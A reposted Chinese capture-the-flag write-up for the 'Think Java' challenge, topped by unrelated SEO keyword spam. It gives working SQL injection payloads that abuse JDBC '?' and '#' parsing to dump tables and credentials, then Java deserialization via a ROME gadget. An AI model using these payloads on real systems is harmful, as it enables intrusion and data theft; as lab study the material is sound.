外贸婚纱网站侵权网站自适应

pingmian/2026/1/26 20:55:42/文章来源:

外贸婚纱网站侵权,网站自适应,重庆建设工程信息网证书查询官网,曲靖市麒麟区建设局规划网站[网鼎杯 2020 朱雀组]Think Java swagger [[swagger]] 首先下载源码#xff0c;查看之后发现查找swagger资料#xff0c;或者扫描#xff0c;得到#xff1a;swagger-ui.html swagger-ui 提供了一个可视化的UI页面展示描述文件。接口的调用方、测试、项目经理等都可以…[网鼎杯 2020 朱雀组]Think Java swagger [[swagger]] 首先下载源码查看之后发现查找swagger资料或者扫描得到swagger-ui.html swagger-ui 提供了一个可视化的UI页面展示描述文件。接口的调用方、测试、项目经理等都可以在该页面中对相关接口进行查阅和做一些简单的接口请求。该项目支持在线导入描述文件和本地部署UI项目。首先去看看sqlDict页面感觉跟sql注入有关 JDBC sql注入 [[JDBC sql注入]] //首先会先通过数据库名进行数据库链接所以这一步不能出错这导致了常规的sql拼接失败了因为拼接之后的字符串不可能是它们其中的一个数据库名所以要采取别的方法try {Class.forName(com.mysql.jdbc.Driver);if (dbName ! null !dbName.equals()) {dbName jdbc:mysql://mysqldbserver:3306/ dbName;} else {dbName jdbc:mysql://mysqldbserver:3306/myapp;}if (user null || dbName.equals()) {user root;}if (pass null || dbName.equals()) {pass abc12345;}conn DriverManager.getConnection(dbName, user, pass);//然后才能进行SQL注入 String sql Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema dbName and table_name TableName ;;ResultSet rs stmt.executeQuery(sql);参考wp写的比较详细 https://blog.csdn.net/RABCDXB/article/details/124003575 https://syunaht.com/p/701889044.html ?#特殊处理 jdbc类似于url解析所以会对于#和?有着不一样的解释 #在jdbc中无实际意义且#号后面的会被忽视。例如myapp# 11会被当做myapp。而SQL语句得到的是11?也是一样的不过需要加个键值对。myapp?a11。得到的SQL语句是11 所以构造将提交方式改为post会好一点 dbNamemyapp?a1unionselect(group_concat(table_name))from(infoRmation_schema.tables)where(table_schema)like(database())#也不一定要用myapp数据库也可以使用mysql自带的数据库比如mysql dbNamemysql?a1unionselect333#上面我们使用myapp数据库的时候其实返回了表名user字段name和pwd所以直接进行注入使用? dbNamemyapp?a1unionselectgroup_concat(name,pwd)fromuser#使用# dbNamemyapp#1unionselectgroup_concat(name,pwd)fromuser#得到 admin adminRrrr_ctf_asde进入登录页面进行登录登录成功之后返回了 java反序列化 [[java反序列化]] 一段数据以rO0AB开头你基本可以确定这串就是Java序列化base64加密的数据。或者如果以aced开头那么他就是这一段Java序列化的16进制。很明显是base64加密进入最后一个将数据放入抓包看到回显的数据就是admin用户名尝试反序列化利用 java Deserialization Scanner [[java反序列化#java Deserialization Scanner]] 分析组件可以简化ysoserial使用流程是bp里面的插件下载安装看这篇博客吧 https://blog.csdn.net/RABCDXB/article/details/124003575主要讲如何使用有三个模块分别是组件分析漏洞利用配置使用组件分析进入使用显现红色的就是它推测出来的组件这里是ROME 漏洞利用进入使用最后监听9999 端口得到

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/pingmian/85402.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！